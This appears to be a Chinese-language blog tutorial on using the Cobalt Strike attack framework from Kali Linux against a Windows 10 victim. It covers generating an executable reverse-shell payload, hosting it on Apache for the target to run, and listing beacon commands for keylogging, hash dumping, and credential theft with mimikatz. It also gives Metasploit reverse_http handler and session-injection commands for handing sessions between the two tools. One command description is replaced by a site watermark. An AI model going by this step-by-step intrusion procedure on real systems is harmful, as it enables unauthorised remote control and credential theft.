Cobalt Strike
是一款美国Red Team开发的渗透测试神器,常被业界大佬称为CS。本文将会讲述如何在kali Linux安装Cobalt Strike以及使用这款神器。希望给各位一点帮助。
环境介绍
- kali linux 2021
- Cobalt Strike4.3
- windows10(受害机)
在kali中安装Cobalt Strike
在kali中安装很简单,Cobalt Strike是基于Java的。因为kali中已经安装了Java环境,所以我们直接可以运行Cobalt Strike。
进入Cobalt Strike目录,执行./start.sh
即可运行Cobalt Strike。
这样便启动了Cobalt Strike
如上会提示登录
这时我们需要启动登录服务,因为Cobalt Strike 是可以团队操作。也就是所我们需要启动团队服务器。执行下面命令:
./teamserver 192.168.123.33 pass66
#./teamserver kali的ip 登录密码
生成shell
首先配置监听
和msfconsole类似,Cobalt Strike也要配置监听。Cobalt Strike
——Listeners
——Add
相关参数说明:
参数 | 说明 |
---|---|
name | 监听任务的名称 可随意 |
payload | 监听的方式 支持http https TCP 等 |
HTTPS HOSTS | 主机IP地址 |
Host Rotation Strategy | 主机转移策略 一般默认即可 |
生成shellAttacks
—Packages
——windows ececutable
配置windows平台下的shell
保存生成的shell
参数 | 说明 |
---|---|
HTML Application | 基于http方式的攻击,如受害者打开网站即可获得shell |
MS Office Macro | office宏攻击,如打开word文档即可获得shell |
Payload Generator | 其他方式的payload,如C python vb |
windows ececutable | 生成windows平台下的shell |
Shell上线
将生成的shell放到/var/www/html,并启动apache服务器
cp kali.exe /var/www/html
service apache2 start
当目标主机下载并运行shell后,我们便可以看到回弹。
对目标主机的操作
interact 命令模式
当我们点击interact
后,便会和msfconsole一样,进入命令模式。
现列出常用的命名
参数 | 说明 |
---|---|
argue | 匹配进程的欺骗参数 |
blockdlls | 阻止子进程中的非Microsoft DLL |
browserpivot | 设置浏览器会话 |
cancel | 取消正在进行的下载 |
cd | 改变目录位置 |
checkin | 呼叫总部并发布数据 |
chromedump | 从Google Chrome恢复凭据 |
clear | 清除信标队列 |
connect | 通过TCP连接到目标 |
covertvpn | 部署隐蔽VPN客户端 |
cp | 复制文件 |
dcsync | 从DC提取密码哈希 |
desktop | 查看目标桌面并与之交互 |
dllinject | bbskali.cn |
dllload | 将反射DLL注入进程 |
download | 文件下载 |
downloads | 列出正在下载的文件 |
drives | 列出目标上的驱动器 |
elevate | 在提升的上下文中生成会话 |
exit | 关闭当前连接 |
getprivs | 对当前令牌启用系统权限 |
getsystem | 提升系统权限 |
getuid | 获取用户ID |
hashdump | 导出hash密码 |
keylogger | 记录键盘 |
kill | Kill 掉进程 |
logonpasswords | 使用mimikatz转储凭据和哈希 |
ls | 列出文件列表 bbskali.cn |
make_token | 创建一个 token |
mimikatz | 运行神器 mimikatz |
mkdir | 创建一个目录 |
mv | 移动文件 |
net | 网络和主机枚举 |
upload | 上传文件 |
如获取C盘文件信息
cd /
ls
和目标屏幕交互
desktop
其他菜单操作
由于比较多,就不一个个说了。把常用的几个菜单说说。
可视化的文件浏览
Explore
-File Browser
对局域网内所有设备扫描
显示目标的所有进程
Cobalt Strike与Msfconsole联动
首先我们在Cobalt Strike中创建一个新的Foreign Http
监听
然后在msfconsole中配置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.123.33
set LPORT 4444
exploit
返回Cobalt Strike,选择目标,右键Spawn
选择我们前面配置的Foreign Http
监听
这时,我们返回到msf中便可以看到成功得到回弹。
将msf会话转移到Cobalt Strike
一样,我们先建立一个http的监听
因为在msf中我们已经获得了session
在其配置如下:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set LHOST 192.168.123.33
set LPORT 5555
set SESSION 1
run
set DisablePayloadHandler true
作用是msf不监听,代表是用来返给其他监听的 。
然后我们返回到Cobalt Strike这时便可以看到会话了
其他文章推荐
《Cobalt Strike 目标上线微信提示》
《Cobalt Strike入坑指南(利用office文件获取shell)》
未完待续……
One comment